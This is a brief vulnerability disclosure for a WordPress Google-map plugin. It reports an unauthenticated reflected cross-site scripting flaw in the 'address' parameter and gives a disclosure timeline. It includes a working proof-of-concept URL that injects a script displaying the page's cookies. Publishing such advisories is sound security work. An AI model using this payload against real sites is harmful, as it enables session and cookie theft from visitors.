Plugin Details
Plugin Name: wp-plugin : google-map-generator
Effected Version : 1.3.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/google-map-generator/google-map.php?address="><script>alert(document.cookie)</script>&
Vulnerable Parameter : address
Type of XSS : Reflected
Disclosure Timeline
Vendor Contacted : 2014-01-05
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[|
Using this plugin you can embed google map inside the post or link google map with a link as a popup. example: embed google map <code>{gmap|address|width|height}</code> , popup google map <code><a href="{gmap_link|address|width|height}">Link Label</a></code> .
eaxmple: {gmap|Athens, Greece|400|200}
or
<a href="{gmap_link|Athens, Greece|400|200}">Map of Athens, Greece</a>
]